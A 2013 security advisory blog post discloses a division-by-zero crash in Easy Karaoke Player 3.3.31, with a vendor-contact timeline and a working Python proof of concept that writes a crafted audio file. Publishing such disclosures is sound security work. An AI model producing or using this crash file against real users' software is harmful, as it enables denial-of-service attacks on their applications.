1. Advisory Information
Title: Easy Karaoke Player WAV File Handling DoS Weakness
Advisory URL: https://osandamalith.com/2013/12/27/easy-karaoke-player-wav-file-handling-dos-weakness
Date published: 2013-12-22
Vendors contacted: 008soft
Release mode: User release
2. Vulnerability Information
Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A
3. Summary
Easy Karaoke Player is a software that is playing karaoke, recording karaoke songs to wav format files. This application is able to read all types of multimedia files with an integrated multimedia player that is both efficient and full-powered.
4. Vulnerability Description
Easy Karaoke Player contains a flaw that may allow a denial of service. The issue is triggered when handling a specially crafted WAV file. This may allow a context-dependent attacker to crash the program.
5. Vulnerable Packages
- 3.3.31
- Older Versions might be vulnerable as well, they were not tested
6. Credits
This bug was researched by Osanda Malith Jayathissa.
7. Proof of Concept / Technical Details
[code language=”python”]
#!/usr/bin/python
#Title: Easy Karaokay Player 3.3.31 (.wav) Integer Division by Zero
#Version: 3.3.31 (Older Versions might be vulnerable as well)
#Tested on: Windows XP SP2 en
#Vendor: http://www.008soft.com/
#Software Link: http://www.008soft.com/downloads_karaoke.exe
#E-Mail: OsandaJayathissa@gmail.com
#Author: Osanda Malith
#Twitter: @OsandaMalith
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
string=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
filename = "keraokayplayer.wav"
file = open(filename , "w")
file.write(string)
file.close()
#EOF
[/code]
8. Report Timeline
2013-09-19: The researcher notifies the vendor 008soft.
2013-09-23: The researcher attempts to contact the vendor
2013-10-05: The researcher attempts to contact the vendor
2013-12-22: Advisory and public disclosure
9. Disclaimer
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
10. References
[1] http://www.exploit-db.com/exploits/30422/
[2] http://packetstormsecurity.com/files/124577/Easy-Karaoke-Player-3.3.31-Integer-Division-By-Zero.html
[3] http://www.osvdb.org/show/osvdb/101441
Good one boss.. As always.
Woow Great 🙂